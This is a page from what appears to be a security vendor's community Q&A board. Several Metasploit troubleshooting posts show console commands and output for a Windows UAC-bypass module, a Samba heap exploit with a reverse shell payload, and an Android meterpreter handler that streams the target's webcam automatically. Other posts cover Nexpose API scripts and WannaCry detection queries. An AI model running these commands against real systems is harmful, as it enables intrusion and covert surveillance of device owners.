Knowledge Base

Ask A Question

Questions

1
ANSWERED

Metasploit: Bypass UAC Module Not Working [dr.dinosaur]

Can someone tell me what's going on here? I have a meterpreter session; it works fine. To bypass UAC in an effort to get system, I am using the Bypass UAC module. It seems to think I am using the x86 version, even though I specified the x64 version. I also tried the x86 version, which didn't work. I have also migrated to two different x86_64 processes, but that didn't help. Thanks. ~~~~ msf exploit(bypassuac_injection) > info Name: Windows Escalate UAC Protection Bypass (In Memory Injection) Module: exploit/windows/local/bypassuac_injection Platform: Windows Privileged: No License: Metasploit Framework License (BSD) Rank: Excellent Provided by: David Kennedy "ReL1K" mitnick mubix Ben Campbell Available targets: Id Name -- ---- 0 Windows x86 1 Windows x64 Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- SESSION yes The session to run this module on. Payload information: Description: This module will bypass Windows UAC by utilizing the trusted publisher certificate through process injection. It will spawn a second shell that has the UAC flag turned off. This module uses the Reflective DLL Injection technique to drop only the DLL payload binary instead of three seperate binaries in the standard technique. However, it requires the correct architecture to be selected, (use x64 for SYSWOW64 systems also). If specifying EXE::Custom your DLL should call ExitProcess() after starting your payload in a seperate process. msf exploit(bypassuac_injection) > set TARGET 1 TARGET => 1 msf exploit(bypassuac_injection) > set SESSION 1 SESSION => 1 msf exploit(bypassuac_injection) > exploit [*] Started reverse handler on 192.168.2.217:4444 [*] UAC is Enabled, checking level... [+] UAC is set to Default [+] BypassUAC can bypass this setting, continuing... [+] Part of Administrators group! Continuing... [*] Uploading the Payload DLL to the filesystem... [*] Spawning process with Windows Publisher Certificate, to inject into... [-] Exploit failed [bad-config]: x86 Target Selected for x64 System msf exploit(bypassuac_injection) > show options Module options (exploit/windows/local/bypassuac_injection): Name Current Setting Required Description ---- --------------- -------- ----------- SESSION 1 yes The session to run this module on. Payload options (generic/shell_reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 192.168.2.217 yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 1 Windows x64 msf exploit(bypassuac_injection) > set TARGET 0 TARGET => 0 msf exploit(bypassuac_injection) > exploit [*] Started reverse handler on 192.168.2.217:4444 [*] UAC is Enabled, checking level... [+] UAC is set to Default [+] BypassUAC can bypass this setting, continuing... [+] Part of Administrators group! Continuing... [-] Exploit failed: Rex::TimeoutError Operation timed out. msf exploit(bypassuac_injection) > exploit [*] Started reverse handler on 192.168.2.217:4444 [*] UAC is Enabled, checking level... [+] UAC is set to Default [+] BypassUAC can bypass this setting, continuing... [+] Part of Administrators group! Continuing... [*] Uploading the Payload DLL to the filesystem... [*] Spawning process with Windows Publisher Certificate, to inject into... [-] Exploit failed [bad-config]: x86 Target Selected for x64 System msf exploit(bypassuac_injection) > set TARGET 1 TARGET => 1 msf exploit(bypassuac_injection) > exploit [*] Started reverse handler on 192.168.2.217:4444 [*] UAC is Enabled, checking level... [+] UAC is set to Default [+] BypassUAC can bypass this setting, continuing... [-] Unable to identify admin group membership [-] Either whoami is not there or failed to execute [-] Continuing under assumption you already checked... [*] Uploading the Payload DLL to the filesystem... [*] Spawning process with Windows Publisher Certificate, to inject into... [-] Exploit failed [bad-config]: x86 Target Selected for x64 System msf exploit(bypassuac_injection) > exploit [*] Started reverse handler on 192.168.2.217:4444 [*] UAC is Enabled, checking level... [+] UAC is set to Default [+] BypassUAC can bypass this setting, continuing... [+] Part of Administrators group! Continuing... [*] Uploading the Payload DLL to the filesystem... [*] Spawning process with Windows Publisher Certificate, to inject into... [-] Exploit failed [bad-config]: x86 Target Selected for x64 System msf exploit(bypassuac_injection) > ~~~~

Posted by Stephanie Coyle 2 years ago

3
ANSWERED

Nexpose: I am having trouble applying expections to asset group via API [David Mir]

I'm not a ruby programmer but I have been trying to get misterpaul's ruby script to work with the latest Nexpose API. Basically, I want to apply exception to an asset group I have created based on the straight script found on his site here: https://github.com/misterpaul/NexposeRubyScripts/blob/master/ApplyExceptionToGroup/ApplyExceptionToGroup.rb However, this doesn't work with the latest API so I rewrote most of the beginning to make it work, but I am having issue with the last part about listing all exceptions, and filtering our devices to apply exceptions to asset group devices. Any help would be appreciated. Thank you, I have my code listed below from misterpaul's with comments on the changes I made. ~~~~ # gem 'nexpose', '=0.0.98' require 'rubygems' require 'nexpose' require 'highline/import' require 'csv' thedate = DateTime.now # Defaults: Change to suit your environment. # default_host = 'your-host' # default_port = 3780 # default_name = 'your-nexpose-id' default_host = 'OurNexposeIP' default_port = 3780 default_name = 'MyUserName' default_file = 'ExceptionList_' + thedate.strftime('%Y-%m-%d--%H%M') + '.csv' default_logfile = 'ApplyExceptionToGroup_' + thedate.strftime('%Y-%m-%d--%H%M') + '.log' default_filter = 'none' puts # blank line for clarity host = ask('Enter the server name (host) for Nexpose: ') { |q| q.default = default_host } port = ask('Enter the port for Nexpose: ') { |q| q.default = default_port.to_s } user = ask('Enter your username: ') { |q| q.default = default_name } pass = ask('Enter your password: ') { |q| q.echo = '*' } puts file = ask('Enter the filename for a list of current vulnerability exceptions. Enter "none" (without quotes) if you don\'t want to create the file: ') { |q| q.default = default_file } puts logfile = ask('Enter the filename to log results into: ') { |q| q.default = default_logfile } begin # Create a connection to the NeXpose instance @nsc = Nexpose::Connection.new(host, user, pass, port) # Authenticate to this instance (throws an exception if this fails) @nsc.login # get all vulnerability exceptions and load them in a file for the user to select one to replicate exceptions = @nsc.list_vuln_exceptions unless file == 'none' begin CSV.open(file, 'wb') do |csv| ~~~~ **The following section from misterpaul did not work for me** ~~~~ # #csv << ['Vuln ID', 'Exception ID', 'Submitter', 'Reviewer', 'Status', 'Reason', 'Scope', 'Device id', 'port', 'expiration', 'vuln key', 'submitter comment', 'reviewer comment'] #exceptions.each do |e| #csv << e.values #end #end #puts #puts 'You may now go open ' + file + ' to find the exception id(s) you want.' #rescue Exception => e #puts 'Failed to create Exception listing file: ' + file #puts e #end #end ~~~~ **This is my code rewrite of the above section** ~~~~ csv << ['Vuln ID', 'Exception ID', 'Submitter', 'Reviewer', 'Status', 'Reason', 'Scope', 'Device id', 'port', 'expiration', 'vuln key', 'submitter comment', 'reviewer comment'] exceptions.each do |e| csv << [e.vuln_id, e.id, e.submitter, e.reviewer, e.status, e.reason, e.scope, e.asset_id, e.port, e.expiration, e.vuln_key, e.submitter_comment, e.reviewer_comment] end end puts puts 'You may now go open ' + file + ' to find the exception id(s) you want.' rescue Exception => e puts 'Failed to create Exception listing file: ' + file puts e end end # now select the exception(s) to replicate puts replicateIds = ask ('Enter the id(s) for exception to replicate for the group (separate ids by spaces): ') idList = replicateIds.split(' ') ~~~~ **The following section ALSO did not work for me** ~~~~ # select which group we're creating exceptions for #puts #filter = ask ('Enter a string to use to filter the group list. Enter "none" (without quotes) for no filter: ') { |q| q.default = default_filter } #grouplist = @nsc.asset_groups_listing.sort_by {|g| g[:name]}.select { |h| filter != 'none' ? h[:name] =~ /#{filter}/i : true } #choicemap = Hash.new #choice = choose do |menu| #menu.prompt = 'Please select the group to use:' #grouplist.each do |grp| #menu.choice(grp[:name]) #choicemap[grp[:name]] = grp[:asset_group_id] #end #end #asset_group = @nsc.asset_group_config(choicemap[choice]) ~~~~ **So, I ALSO rewrote the above section to something that worked for me, listed below** ~~~~ # select which group we're creating exceptions for puts filter = ask ('Enter a string to use to filter the group list. Enter "none" (without quotes) for no filter: ') { |q| q.default = default_filter } grouplist = @nsc.list_asset_groups.sort_by {|g| g.name}.select { |h| filter != 'none' ? h.name =~ /#{filter}/i : true } choicemap = Hash.new choice = choose do |menu| menu.prompt = 'Please select the group to use:' grouplist.each do |grp| menu.choice(grp.name) choicemap[grp.name] = grp.id end end puts choicemap[choice] asset_group = grouplist.select{|gp| gp.id==choicemap[choice]} ~~~~ The rest of his code worked fine, as shown below: ~~~~ # get the details from the appropriate exception exceptions = @nsc.vuln_listing idList.each do |replicateId| replicate = Array.new # array used to hold data to copy exceptionList = Array.new # array used to validate that an exception is only applied once exceptions.each do |e| if e[:exception_id] == replicateId replicate = e end exceptionList << { :device_id => e[:device_id].nil? ? '' : e[:device_id], :vuln_id => e[:vuln_id], :scope => e[:scope], :port_no => e[:port_no].nil? ? '' : e[:port_no], :vuln_key => e[:vuln_key].nil? ? '' : e[:vuln_key], :status => e[:status] } end # begin logging File.open(logfile, 'w') do |log| log.puts 'Log for ApplyExceptionToGroup, ' + thedate.strftime('%Y-%m-%d--%H%M') log.puts log.puts 'Exception to replicate:' log.puts 'exception_id: ' + replicateId + ', ' + 'vuln_id: ' + replicate[:vuln_id] + ', ' + 'device_id: ' + replicate[:device_id] + ', ' + 'submitter: ' + replicate[:submitter] + ', ' + 'reason: ' + replicate[:reason] + ', ' + 'scope: ' + replicate[:scope] + ', ' + 'comment: ' + (replicate[:submitter_comment].nil? ? '' : replicate[:submitter_comment].to_s) + ', ' + 'port_no: ' + (replicate[:port_no].nil? ? '' : replicate[:port_no].to_s) + ', ' + 'vuln_key: ' + (replicate[:vuln_key].nil? ? '' : replicate[:vuln_key].to_s) # add some info to the comment to document this script's actions comment = 'This exception auto-created using ApplyExceptionToGroup ruby script, based on Exception #' + replicateId + ' requested by ' + replicate[:submitter] + ', applied to group \'' + choice + "'.\r\n" + replicate[:submitter_comment] # NOTE: use of double quotes required above for \r\n to work # comments cannot be more than 1024 characters if comment.length > 1024 comment = comment.slice(0..1011) + ' [truncated]' end # now go create the new exceptions for each asset asset_group.each do |asset| log.puts # toss an extra line in for clarity # check for duplicates # a duplicate is an existing exception with the same device id, vulnerability id, scope, port, and vuln key # AND is not deleted dupe = exceptionList.select { |e| ( (asset[:device_id].nil? ? '' : asset[:device_id].to_s) == e[:device_id].to_s) && ( replicate[:vuln_id].to_s == e[:vuln_id].to_s ) && ( replicate[:scope].to_s == e[:scope].to_s ) && ( (replicate[:port_no].nil? ? '' : replicate[:port_no].to_s) == e[:port_no].to_s ) && ( (replicate[:vuln_key].nil? ? '' : replicate[:vuln_key].to_s) == e[:vuln_key].to_s ) && e[:status] != 'Deleted' } if dupe.size > 0 log.puts 'Duplicate: did not create new exception for device ' + asset[:device_id].to_s next end # not a duplicate. so build the exception exceptionDetails = Hash.new exceptionDetails[:vuln_id] = replicate[:vuln_id] exceptionDetails[:reason] = replicate[:reason] exceptionDetails[:scope] = replicate[:scope] exceptionDetails[:comment] = comment exceptionDetails[:device_id] = asset[:device_id] unless replicate[:scope] =~ /All Instances on a Specific Asset/ exceptionDetails[:port] = replicate[:port_no] exceptionDetails[:vuln_key] = replicate[:vuln_key] end exception = @nsc.vuln_exception_create(exceptionDetails) log.puts 'Created Exception:' log.puts 'exception_id: ' + exception.to_s + ', ' + 'vuln_id: ' + exceptionDetails[:vuln_id] + ', ' + 'device_id: ' + exceptionDetails[:device_id].to_s + ', ' + 'reason: ' + exceptionDetails[:reason] + ', ' + 'scope: ' + exceptionDetails[:scope] + ', ' + 'comment: ' + (exceptionDetails[:comment].nil? ? '' : exceptionDetails[:comment].to_s) + ', ' + 'port_no: ' + (exceptionDetails[:port_no].nil? ? '' : exceptionDetails[:port_no].to_s) + ', ' + 'vuln_key: ' + (exceptionDetails[:vuln_key].nil? ? '' : exceptionDetails[:vuln_key].to_s) end end end rescue ::Nexpose::APIError => e $stderr.puts ('Nexpose API failure: #{e.reason}') exit(1) # should also rescue file errors end ~~~~ Can anyone help me?

Posted by Stephanie Coyle 2 years ago

1
ANSWERED

Nexpose: Export all SQL tables using the API [vmpman]

A few months ago, I needed to reproduce the data reporting model outside of Nexpose. If you copy all of the files that this script creates into your favorite DB package, you can then use a graphical query editor to better visualize your data. This will basically create a new file for every Fact and Dimension in the model. If you want to restrict by site etc, you'll need to add additional filters. This is effectively a manual alternative to the Data Warehouse option in Nexpose. Thanks to [John Aldridge] and [zeroorone] for the help. Enjoy: **<Enclosed Brackets> = Edit this text** ```ruby def runreport(sql_table, where_clause) begin e=nil nsc = Nexpose::Connection.new('<Your Rapid7 Console>', '<User account name>', '<Password for user account>') nsc.login query ="SELECT * FROM #{sql_table}" if where_clause != nil query = "#{query} #{where_clause}" end puts query report_config = Nexpose::AdhocReportConfig.new(nil, 'sql') report_config.add_filter('version', '2.0.1') report_config.add_filter('query', query) #if you want to restrict by a site or asset group you'd do it similar to the lines above report_output = report_config.generate(nsc) csv_output = CSV.parse(report_output.chomp, { :headers => :first_row }) CSV.open("\\<\\server\\path\\path\\>#{sql_table}.csv", 'w') do |csv_file| #make sure you use double slashes in the path to any files in ruby ie. "\\" is turned into "\" by ruby csv_file << csv_output.headers csv_output.each do |row| csv_file << row end end rescue StandardError=>e return "Error: #{e}" puts "Error: #{sql_table}, #{e}" ensure if e == nil return "Success: #{sql_table}.csv" puts "Success: #{sql_table}.csv" end nsc.logout end end #Everything from here down just calls the function above. You can insert a Where clause instead of the "nil" for each table. result = runreport('fact_asset' ,nil) result = runreport('fact_asset_vulnerability_finding' ,nil) result = runreport('fact_asset_vulnerability_age' ,nil) result = runreport('fact_asset_vulnerability_instance' ,nil) result = runreport('fact_asset_vulnerability_instance_excluded' ,nil) result = runreport('fact_asset_discovery' ,nil) result = runreport('fact_asset_scan' ,nil) result = runreport('fact_asset_date' ,nil) result = runreport('fact_asset_policy_date' ,nil) result = runreport('fact_asset_scan_operating_system' ,nil) result = runreport('fact_asset_scan_software' ,nil) result = runreport('fact_asset_scan_service' ,nil) result = runreport('fact_asset_scan_vulnerability_finding' ,nil) result = runreport('fact_asset_scan_vulnerability_instance' ,nil) result = runreport('fact_asset_scan_vulnerability_instance_excluded' ,nil) result = runreport('fact_pci_asset_service_finding' ,nil) result = runreport('fact_pci_asset_scan_service_finding' ,nil) result = runreport('fact_pci_asset_special_note' ,nil) result = runreport('fact_asset_group' ,nil) result = runreport('fact_asset_group_date' ,nil) result = runreport('fact_asset_group_policy_date' ,nil) result = runreport('fact_tag' ,nil) result = runreport('fact_tag_date' ,nil) result = runreport('fact_tag_policy_date' ,nil) result = runreport('fact_scan' ,nil) result = runreport('fact_site' ,nil) result = runreport('fact_site_date' ,nil) result = runreport('fact_site_policy_date' ,nil) result = runreport('fact_vulnerability' ,nil) result = runreport('fact_remediation' ,nil) result = runreport('fact_remediation_impact' ,nil) result = runreport('fact_policy' ,nil) result = runreport('fact_asset_policy' ,nil) result = runreport('fact_asset_scan_policy' ,nil) result = runreport('fact_policy_rule' ,nil) result = runreport('fact_asset_policy_rule' ,nil) result = runreport('fact_policy_group' ,nil) result = runreport('dim_scope_site' ,nil) result = runreport('dim_scope_asset' ,nil) result = runreport('dim_scope_asset_group' ,nil) result = runreport('dim_scope_tag' ,nil) result = runreport('dim_scope_scan' ,nil) result = runreport('dim_scope_filter_vulnerability_status' ,nil) result = runreport('dim_scope_filter_vulnerability_category_include' ,nil) result = runreport('dim_scope_filter_vulnerability_category_exclude' ,nil) result = runreport('dim_scope_filter_vulnerability_severity' ,nil) result = runreport('dim_scope_policy' ,nil) result = runreport('dim_asset' ,nil) result = runreport('dim_asset_scan' ,nil) result = runreport('dim_asset_host_name' ,nil) result = runreport('dim_asset_ip_address' ,nil) result = runreport('dim_asset_mac_address' ,nil) result = runreport('dim_asset_operating_system' ,nil) result = runreport('dim_asset_software' ,nil) result = runreport('dim_asset_service' ,nil) result = runreport('dim_asset_service_configuration' ,nil) result = runreport('dim_asset_service_credential' ,nil) result = runreport('dim_asset_user_account' ,nil) result = runreport('dim_asset_group_account' ,nil) result = runreport('dim_asset_file' ,nil) result = runreport('dim_site' ,nil) result = runreport('dim_site_scan' ,nil) result = runreport('dim_site_scan_config' ,nil) result = runreport('dim_site_asset' ,nil) result = runreport('dim_site_target' ,nil) result = runreport('dim_asset_group' ,nil) result = runreport('dim_asset_group_asset' ,nil) result = runreport('dim_tag' ,nil) result = runreport('dim_tag_asset' ,nil) result = runreport('dim_scan' ,nil) result = runreport('dim_scan_template' ,nil) result = runreport('dim_scan_engine' ,nil) result = runreport('dim_software' ,nil) result = runreport('dim_operating_system' ,nil) result = runreport('dim_fingerprint_source' ,nil) result = runreport('dim_service' ,nil) result = runreport('dim_service_fingerprint' ,nil) result = runreport('dim_vulnerability' ,nil) result = runreport('dim_vulnerability_category' ,nil) result = runreport('dim_vulnerability_exploit' ,nil) result = runreport('dim_vulnerability_malware_kit' ,nil) result = runreport('dim_vulnerability_reference' ,nil) result = runreport('dim_vulnerability_exception' ,nil) result = runreport('dim_solution' ,nil) result = runreport('dim_vulnerability_solution' ,nil) result = runreport('dim_solution_highest_supercedence' ,nil) result = runreport('dim_solution_prerequisite' ,nil) result = runreport('dim_solution_supercedence' ,nil) result = runreport('dim_asset_vulnerability_solution' ,nil) result = runreport('dim_policy' ,nil) result = runreport('dim_policy_group' ,nil) result = runreport('dim_policy_rule' ,nil) result = runreport('dim_policy_override' ,nil) result = runreport('dim_scan_status' ,nil) result = runreport('dim_scan_type' ,nil) result = runreport('dim_host_name_source_type' ,nil) result = runreport('dim_host_type' ,nil) result = runreport('dim_vulnerability_status' ,nil) result = runreport('dim_cvss_access_vector' ,nil) result = runreport('dim_cvss_access_complexity' ,nil) result = runreport('dim_cvss_authentication' ,nil) result = runreport('dim_cvss_confidentiality_impact' ,nil) result = runreport('dim_cvss_integrity_impact' ,nil) result = runreport('dim_cvss_availability_impact' ,nil) result = runreport('dim_protocol' ,nil) result = runreport('dim_exception_scope' ,nil) result = runreport('dim_exception_reason' ,nil) result = runreport('dim_exception_status' ,nil) result = runreport('dim_policy_result_status' ,nil) result = runreport('dim_policy_override_scope' ,nil) result = runreport('dim_policy_override_review_state' ,nil) result = runreport('dim_credential_status' ,nil) result = runreport('dim_aggregated_credential_status' ,nil) result = runreport('dim_pci_note' ,nil) result = runreport('dim_mobile_asset_attribute' ,nil) ```

Posted by Edward Sheehy 2 years ago

4
ANSWERED

Nexpose: WannaCry - Scanning & Reporting [00jay]

In light of the recent WannaCry Ransomware attacks, I thought it'd be great to share ways of finding out which assets are susceptible to this attack. 1. Create a custom scan template to check for MS17-010 The easiest way to create a Custom template is by making a copy of an existing template: * Administration tab -> Templates * Click: "Manage" * Copy "Full audit enhanced logging without Web Spider" Template * IMPORTANT: Name your copy of the scan template * Click: "Vulnerability Checks" tab * Expand: "By Individual Check" dropdown * Click: "Add Checks" button * Enter: MS17-010 (As of 5/15/17, there are 192 individual checks) Be sure to remove all checks from the "By Category" and "By Check Type" sections to ensure that only the individual checks are loaded for the scan(s). 2. If you want to create a Dynamic Asset Group (DAG) for assets vulnerable to this attack: * Create a new DAG with the following filters: > 'CVE ID' 'is' CVE-2017-0143 > 'CVE ID' 'is' CVE-2017-0144 > 'CVE ID' 'is' CVE-2017-0145 > 'CVE ID' 'is' CVE-2017-0146 > 'CVE ID' 'is' CVE-2017-0147 > 'CVE ID' 'is' CVE-2017-0148 Change "Match (all) of the specified filters." to "Match (any) of the specified filters." Hit "SEARCH". You should then have a result of all assets that have ANY of those CVEs specified above. 3. You can also create a SQL report to list ANY asset affected by ANY of the 6 CVEs: ```sql SELECT da.ip_address AS "IP Adress", da.host_name AS "Host Name", dv.title AS "Title", dv.description AS "Description", dv.severity AS "Severity" FROM dim_vulnerability dv JOIN dim_asset_vulnerability_solution das USING(vulnerability_id) JOIN dim_asset da USING(asset_id) WHERE title ILIKE '%2017-0143%' OR title ILIKE '%2017-0144%' OR title ILIKE '%2017-0145%' OR title ILIKE '%2017-0146%' OR title ILIKE '%2017-0147%' OR title ILIKE '%2017-0148%' ``` (Please keep in mind that it will list every instance of any of the CVEs in question.) There are currently 32 checks for each CVE, there are 6 CVEs; a total of 192 checks. However, an asset should not list more than one check for each CVE which should result at most 6 instances per asset. You can create a SQL query to check for only the count or unique instances that way the report contains less rows.

Posted by Edward Sheehy 2 years ago

2
ANSWERED

Metasploit: I am experiencing a problem with multi_console_command [Leonardo Gintoli]

Hi, I'm having problems with the multi_console_command component in Metasploit. This is what I run in the msfconsole: ~~~~ Use exploit/multi/handler Set payload android/meterpreter/ reverse_tcp Set LHOST 192.168.0.240 Set LPORT 3460 Set ExitOnSession false Set AutoRunScript multi_console_command -rc scriptcamandroid.rc Exploit -j -z ~~~~ In the Metasploit root, the file `scriptcamandroid.rc` has the following commands: ~~~~ webcam_stream -i 2 -q 45 -d 84000 exit ~~~~ After Metasploit opens the session, it automatically starts autorun with this multi console command: ~~~~ Session ID 1 (192.168.0.240:3460 -> xxx.xxx.xxx.xxx:52894) processing AutoRunScript 'multi_console_command -rc scriptcamandroid.rc' Multi Command Execution Meterpreter Script Console ~~~~ OPTIONS: ~~~~ -cl <opt> Commands to execute. The command must be enclosed in double quotes and separated by a comma. -h Help menu. -rc <opt> Text file with list of commands, one per line. -sl Hide commands for work in background sessions ~~~~ The script commands are not executed. This problem has been present since I updated Metasploit through msfupdate and updated the linux kernel. I tried a clean install of Ubuntu and reinstalled Metasploit, but the problem remains. Then I tried with an old version of Kali that had not been upgraded, and it works perfectly. I also tried using an old version of Metasploit with Ubuntu updated, but the bug remains.

Posted by Stephanie Coyle 2 years ago

1
ANSWERED

Metasploit: I receive a msfcli error when experimenting with Kali Linux [hcl]

I just started my experiments with Metasploit on Kali Linux Here's what I did: ~~~~ msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.105 LPORT=443 E ~~~~ pivoting to another: ~~~~ msf exploit(handler) > search samba [!] Database not connected or cache not built, using slow search ~~~~ However, `db_rebuild_cache` did not help. ~~~~ msf exploit(handler) > use exploit/linux/samba/lsa_transnames_heap msf exploit(lsa_transnames_heap) > set PAYLOAD linux/x86/shell/reverse_tcp [-] The value specified for PAYLOAD is not valid. msf exploit(lsa_transnames_heap) > show payloads msf exploit(lsa_transnames_heap) > ~~~~ Is there a reason why there are no payloads? The same payload loads fine in msfconsole. After that I did some testing and scrolling commands, and this error pops up: ~~~~ m[-] RbReadline Error: TypeError no implicit conversion from nil to integer ["/opt/metasploit/apps/pro/msf3/lib/rbreadline.rb:2770:in `[]'", "/opt/metasploit/apps/pro/msf3/lib/rbreadline.rb:2770:in `update_line'", "/opt/metasploit/apps/pro/msf3/lib/rbreadline.rb:3526:in `block in rl_redisplay'", "/opt/metasploit/apps/pro/msf3/lib/rbreadline.rb:3521:in `each'", "/opt/metasploit/apps/pro/msf3/lib/rbreadline.rb:3521:in `rl_redisplay'", "/opt/metasploit/apps/pro/msf3/lib/rbreadline.rb:4665:in `_rl_internal_char_cleanup'", "/opt/metasploit/apps/pro/msf3/lib/rbreadline.rb:4726:in `readline_internal_charloop'", "/opt/metasploit/apps/pro/msf3/lib/rbreadline.rb:4790:in `readline_internal'", "/opt/metasploit/apps/pro/msf3/lib/rbreadline.rb:4812:in `readline'", "/opt/metasploit/apps/pro/msf3/lib/readline_compatible.rb:77:in `readline'", "/opt/metasploit/apps/pro/msf3/lib/rex/ui/text/input/readline.rb:90:in `pgets'", "/opt/metasploit/apps/pro/msf3/lib/rex/ui/text/shell.rb:184:in `run'", "/opt/metasploit/apps/pro/msf3/msfconsole:169:in `<main>'"] ~~~~ Well, after that I gave it another shot and here what I received: ~~~~ msf exploit(handler) > use exploit/linux/samba/lsa_transnames_heap msf exploit(lsa_transnames_heap) > set PAYLOAD linux/x86/shell/reverse_tcp PAYLOAD => linux/x86/shell/reverse_tcp msf exploit(lsa_transnames_heap) > show options Module options (exploit/linux/samba/lsa_transnames_heap): Name Current Setting Required Description ---- --------------- -------- ----------- RHOST yes The target address RPORT 445 yes Set the SMB service port SMBPIPE LSARPC yes The pipe name to use [-] Invalid payload defined: linux/x86/shell/reverse_tcp ~~~~ The first two problems appear on two different machines. The other two did not try to replicate "database not connected" and "payload problem." Is msfcli being deprecated?

Posted by Stephanie Coyle 2 years ago